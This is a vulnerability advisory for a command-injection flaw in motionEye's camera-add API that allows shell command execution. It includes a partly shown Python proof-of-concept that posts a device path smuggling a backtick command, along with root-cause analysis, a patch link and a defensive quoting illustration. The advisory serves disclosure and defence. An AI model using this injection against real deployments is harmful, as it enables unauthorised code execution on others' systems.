Remote command execution In motioneye

Description

motionEye vulnerable to RCE in the add_camera function due to unsafe command execution

Summary

Using a crafted (camera) device path with the config/add/add_camera motionEye web API allows an attacker who holds motionEye admin user credentials to execute arbitrary UNIX shell commands in a non-interactive shell as the user running the motionEye instance (motion by default).

function call stack

    post

    add_camera

    config.add_camera

    v4l2ctl.list_resolutions

    utils.call_subprocess

    subprocess.run

PoC

build

RUN_USER="user"
RUN_UID=$(id -u ${RUN_USER})
RUN_GID=$(id -g ${RUN_USER})
TIMESTAMP="$(date '+%Y%m%d-%H%M')"

docker build \
  --network host \
  --build-arg="RUN_UID=${RUN_UID?}" \...

reproduce

Run:

docker run --rm  -d   -p 8765:8765   --hostname="motioneye"   -v /etc/localtime:/etc/localtime:ro   -v /tmp/motioneyeconfig:/etc/motioneye   -v /tmp/motioneyeconfig:/var/lib/motioneye
bash-4.2$ docker logs ceb435eacf55 -f
configure_logging cmd motioneye: False
configure logging to file: None
    INFO: hello! this is motionEye server 0.43.1b3
   DEBUG: found motion executable "/usr/bin/motion" version "4.7.0"
   DEBUG: found ffmpeg executable "/usr/bin/ffmpeg" version "7.1.1-1+b1"
   DEBUG: listing config dir /etc/motioneye...
   DEBUG: found camera with id 1...

Now, run the following script to attack motionEye:

import requests
import json

url = "http://your_ip:8765/config/add?_username=admin&_signature=c22baef3399cb7328e22ded1ca68395b4daecd18"

payload = json.dumps({
  "proto": "v4l2",
  "path": "' `touch /tmp/bbbb` '"...

Discussion

The root cause is that call_subprocess executes a shell command string into which the user-supplied device path is interpolated, protected only by literal single quotes; a path containing a single quote therefore breaks out of the quoting and the remainder is interpreted by the shell, resulting in the vulnerability.

def list_resolutions(device):
    from motioneye import motionctl

    device = utils.make_str(device)

    if device in _resolutions_cache:
        return _resolutions_cache[device]
...

Impact

RCE

Patches

The vulnerability has been patched in motionEye v0.43.1b4: https://github.com/motioneye-project/motioneye/pull/3143

Workarounds

Apply the following patch, which replaces the literal single quotes around the device path in the constructed cmd string with a shlex.quote()d input device: https://patch-diff.githubusercontent.com/raw/motioneye-project/motioneye/pull/3143.patch
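As an added illustration (not code from motionEye or from the advisory), the unsafe quoting pattern beside the shlex.quote() form the patch adopts. The v4l2-ctl command line and both device paths are constructed stand-ins, and shlex.split() stands in for the shell's word splitting so that nothing is executed:

```python
import shlex

# Constructed inputs (not from the advisory): a normal V4L2 device node and a
# path containing shell metacharacters.
SAFE_DEVICE = "/dev/video0"
HOSTILE_DEVICE = "' `echo injected` '"


def build_cmd_vulnerable(device: str) -> str:
    # Vulnerable pattern: the device path is wrapped in literal single quotes.
    # A single quote inside the value closes the quoting early, and whatever
    # follows is parsed by the shell as further words or command substitution.
    # (v4l2-ctl is an assumed stand-in for the real command, not motionEye's.)
    return f"v4l2-ctl --device='{device}' --list-formats-ext"


def build_cmd_fixed(device: str) -> str:
    # Hardened pattern: shlex.quote() escapes the value so the shell always
    # sees it as exactly one word, whatever characters it contains.
    return f"v4l2-ctl --device={shlex.quote(device)} --list-formats-ext"


def shell_words(cmd: str) -> list[str]:
    # Tokenise the command the way a POSIX shell would (quoting honoured,
    # nothing run), so we can see how many arguments the device path became.
    return shlex.split(cmd)


def device_stays_one_word(cmd: str, device: str) -> bool:
    # True when the device path reaches the program intact as the single
    # --device= argument; False means the shell split or reinterpreted it.
    return shell_words(cmd) == ["v4l2-ctl", f"--device={device}", "--list-formats-ext"]


if __name__ == "__main__":
    for dev in (SAFE_DEVICE, HOSTILE_DEVICE):
        for build in (build_cmd_vulnerable, build_cmd_fixed):
            cmd = build(dev)
            print(f"{build.__name__:22} intact={device_stays_one_word(cmd, dev)!s:5} {shell_words(cmd)}")
```

With the hostile path the vulnerable form splits into six shell words, two of which are the backtick segment the shell would evaluate, while the fixed form yields exactly three words with the path preserved verbatim.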

References

https://github.com/motioneye-project/motioneye/issues/3142

Credit

The vulnerability was discovered by Tencent YunDing Security Lab.
